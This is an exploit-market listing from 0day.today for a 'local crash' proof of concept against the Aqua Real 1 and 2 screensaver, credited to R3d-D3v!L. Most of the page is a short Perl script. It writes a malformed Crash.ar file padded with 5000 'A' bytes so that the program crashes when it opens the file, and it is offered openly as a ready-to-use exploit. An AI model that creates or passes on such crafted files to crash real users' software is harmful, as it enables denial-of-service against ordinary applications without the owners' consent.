[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Aqua Real v1 and 2 Local Crash PoC

Author
R3d-D3v!L
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10107
Category
dos / poc
Date add
15-01-2010
Platform
unsorted
==================================
Aqua Real v1 and 2 Local Crash PoC
==================================

[*] Exploit Title: [Local Crash PoC]
[*] Author: [R3d-D3V!L]
[*] Vendor: [http://aquarealscreensaver.com/]
[*] vuln-Version: [Aqua Real 1 & 2]
[*] Tested on: [winxp-sp3]

[*] Exploit:
 
 
#!c/perl/bin/
my $file= "Crash.ar";
my $boom="\x41" x 5000;
open(myfile,'>>Crash.ar') || die "Cannot Creat file\n\n";
print myfile $boom;
print "Done..!~#\n";



#  0day.today [2024-12-23]  #